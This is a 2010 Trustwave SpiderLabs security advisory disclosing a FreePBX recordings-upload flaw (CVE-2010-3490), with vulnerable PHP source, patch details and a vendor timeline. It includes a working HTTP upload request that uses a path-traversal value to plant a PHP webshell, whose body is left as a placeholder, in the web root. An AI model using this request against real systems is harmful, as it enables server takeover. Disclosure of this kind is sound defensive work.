173 lines
No EOL
6.8 KiB
Text
173 lines
No EOL
6.8 KiB
Text
Trustwave's SpiderLabs Security Advisory TWSL2010-005:
|
|
FreePBX recordings interface allows remote code execution
|
|
|
|
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt
|
|
|
|
Published: 2010-09-23
|
|
Version: 1.0
|
|
|
|
Vendor: FreePBX (http://www.freepbx.org/)
|
|
Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it
|
|
Version(s) affected: 2.8.0 and below
|
|
|
|
Product Description:
|
|
FreePBX is an easy to use GUI (graphical user interface) that controls and
|
|
manages Asterisk, the world's most popular open source telephony engine
|
|
software. FreePBX has been developed and hardened by thousands of
|
|
volunteers,has been downloaded over 5,000,000 times, and is utilized in an
|
|
estimated 500,000 active phone systems.
|
|
|
|
Source: http://www.freepbx.org
|
|
Credit: Wendel G. Henrique of Trustwave's SpiderLabs
|
|
|
|
CVE: CVE-2010-3490
|
|
|
|
Finding:
|
|
The configuration interface for FreePBX is prone to a remote arbitrary code
|
|
execution on the system recordings menu. FreePBX doesn't handle file uploads
|
|
in a secure manner, allowing an attacker to manipulate the file extension
|
|
and the beginning of the uploaded file name.
|
|
|
|
The piece of code below, found in page.recordings.php, illustrates part of
|
|
the recordings upload feature.
|
|
|
|
/* Code removed to fit better on advisory */
|
|
|
|
<?php
|
|
if (isset($_FILES['ivrfile']['tmp_name']) &&
|
|
is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
|
|
if (empty($usersnum)) {
|
|
$dest = "unnumbered-";
|
|
} else {
|
|
$dest = "{$usersnum}-";
|
|
}
|
|
$suffix = substr(strrchr($_FILES['ivrfile']['name'], "."), 1);
|
|
$destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
|
|
move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
|
|
echo "<h6>"._("Successfully uploaded")."
|
|
".$_FILES['ivrfile']['name']."</h6>";
|
|
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
|
|
} ?>
|
|
|
|
/* Code removed to fit better on advisory */
|
|
|
|
When a file is uploaded, a copy is saved temporarily under the /tmp/
|
|
directory, where the name of the file is composed of
|
|
user-controlled-staticname.extension, where:
|
|
|
|
"user-controlled" is $usersnum variable.
|
|
"staticname" value is -ivrrecording.
|
|
"extension" is controlled by the user.
|
|
|
|
If $usersnum variable is not defined, then a static string (unnumbered)
|
|
is used.
|
|
|
|
Finally, when the user clicks on the save button on the System Recordings
|
|
interface, the file is saved with the original file name provided by the
|
|
user under the /var/lib/asterisk/sounds/custom/ directory.
|
|
|
|
When uploading a file, an attacker can manipulate the $usersnum variable to
|
|
perform a path traversal attack and save it anyplace that the web server
|
|
user has access, for example the Apache's DocumentRoot. This allows an
|
|
attacker to upload malicious code to the web server and execute it under the
|
|
webserver's access permissions.
|
|
|
|
The HTTP request below illustrates the upload of a phpshell.
|
|
|
|
POST /admin/config.php HTTP/1.1
|
|
Host: 10.10.1.3
|
|
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
|
|
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-us,en;q=0.5
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Keep-Alive: 300
|
|
Proxy-Connection: keep-alive
|
|
Referer: http://10.10.1.3/admin/config.php
|
|
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
|
|
Authorization: Basic base64auth
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------5991806838789183981588991120
|
|
Content-Length: 116089
|
|
|
|
-----------------------------5991806838789183981588991120
|
|
Content-Disposition: form-data; name="display"
|
|
|
|
recordings
|
|
-----------------------------5991806838789183981588991120
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
recordings_start
|
|
-----------------------------5991806838789183981588991120
|
|
Content-Disposition: form-data; name="usersnum"
|
|
|
|
../../../../../var/www/html/admin/SpiderLabs
|
|
-----------------------------5991806838789183981588991120
|
|
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php
|
|
/* WebShell code goes here */
|
|
?>
|
|
|
|
-----------------------------5991806838789183981588991120--
|
|
|
|
To access the webshell in this example, an attacker would use
|
|
the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php
|
|
|
|
Maintainer Response:
|
|
The maintainer has released a patch to address this issue for all versions
|
|
of the software 2.3 and newer.
|
|
|
|
Details of the patch can be found here:
|
|
http://www.freepbx.org/trac/ticket/4553
|
|
|
|
Remediation Steps:
|
|
Install the maintainer-provided patch.
|
|
|
|
Vendor Communication Timeline:
|
|
08/13/10 - Initial contact
|
|
08/18/10 - Vulnerability disclosed
|
|
09/16/10 - Initial fix proposed by maintainer
|
|
09/22/10 - Fix reviewed, improved, and released by maintainer
|
|
09/23/10 - Advisory public release
|
|
|
|
Revision History:
|
|
1.0 Initial publication
|
|
|
|
About Trustwave:
|
|
Trustwave is the leading provider of on-demand and subscription-based
|
|
information security and payment card industry compliance management
|
|
solutions to businesses and government entities throughout the world. For
|
|
organizations faced with today's challenging data security and compliance
|
|
environment, Trustwave provides a unique approach with comprehensive
|
|
solutions that include its flagship TrustKeeper compliance management
|
|
software and other proprietary security solutions. Trustwave has helped
|
|
thousands of organizations--ranging from Fortune 500 businesses and large
|
|
financial institutions to small and medium-sized retailers--manage
|
|
compliance and secure their network infrastructure, data communications and
|
|
critical information assets. Trustwave is headquartered in Chicago with
|
|
offices throughout North America, South America, Europe, Africa, China and
|
|
Australia. For more information, visit https://www.trustwave.com
|
|
|
|
About Trustwave's SpiderLabs:
|
|
SpiderLabs is the advance security team at Trustwave responsible for
|
|
incident response and forensics, ethical hacking and application security
|
|
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
|
|
security incidents, performed thousands of ethical hacking exercises and
|
|
tested the security of hundreds of business applications for Fortune 500
|
|
organizations. For more information visit
|
|
https://www.trustwave.com/spiderlabs
|
|
|
|
Disclaimer:
|
|
The information provided in this advisory is provided "as is" without
|
|
warranty of any kind. Trustwave disclaims all warranties, either express or
|
|
implied, including the warranties of merchantability and fitness for a
|
|
particular purpose. In no event shall Trustwave or its suppliers be liable
|
|
for any damages whatsoever including direct, indirect, incidental,
|
|
consequential, loss of business profits or special damages, even if
|
|
Trustwave or its suppliers have been advised of the possibility of such
|
|
damages. Some states do not allow the exclusion or limitation of liability
|
|
for consequential or incidental damages so the foregoing limitation may not
|
|
apply. |